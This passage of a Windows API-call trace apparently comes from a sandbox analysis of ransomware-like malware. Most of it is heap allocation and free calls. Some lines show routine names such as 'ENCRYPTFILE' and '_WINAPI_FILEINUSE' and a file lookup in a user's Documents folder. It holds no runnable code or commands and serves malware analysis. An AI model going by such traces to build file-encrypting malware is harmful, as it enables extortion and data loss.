out: hHeap=0x1780000) returned 1 [0083.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0083.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d99f8 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0083.296] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0083.296] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0083.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0083.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0083.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0083.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0083.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0083.297] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.297] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0083.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0083.300] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0083.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0083.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a10 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0083.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0083.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0083.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x150) returned 0x43ccec8 [0083.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0083.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0083.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0083.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0083.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf88 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0083.302] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0083.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0083.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0083.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0083.302] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0083.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0083.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0083.303] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd43305b0, ftCreationTime.dwHighDateTime=0x1d5ee22, ftLastAccessTime.dwLowDateTime=0x1c93bf30, ftLastAccessTime.dwHighDateTime=0x1d5ea6c, ftLastWriteTime.dwLowDateTime=0x1c93bf30, ftLastWriteTime.dwHighDateTime=0x1d5ea6c, nFileSizeHigh=0x0, nFileSizeLow=0xb865, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="zSm3MoFqp.odp", cAlternateFileName="ZSM3MO~1.ODP")) returned 0x41ac440 [0083.303] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0083.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0083.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0083.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0083.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0083.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0083.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0083.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0083.303] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0083.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0083.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a20 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0083.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafd0 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0083.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0083.304] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0083.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0083.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0083.305] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0083.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0083.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b00 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0083.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a30 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0083.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2970 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0083.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0083.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadd8 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0083.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0083.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0083.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0083.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0083.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0083.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0083.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0083.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0083.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0083.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0083.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0083.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0083.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0083.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0083.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0083.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0083.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0083.310] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0083.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0083.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0083.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0083.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0083.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0083.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0083.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0083.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0083.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0083.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0083.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0083.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0083.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0083.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0083.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0083.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0083.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0083.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0083.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0083.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0083.314] 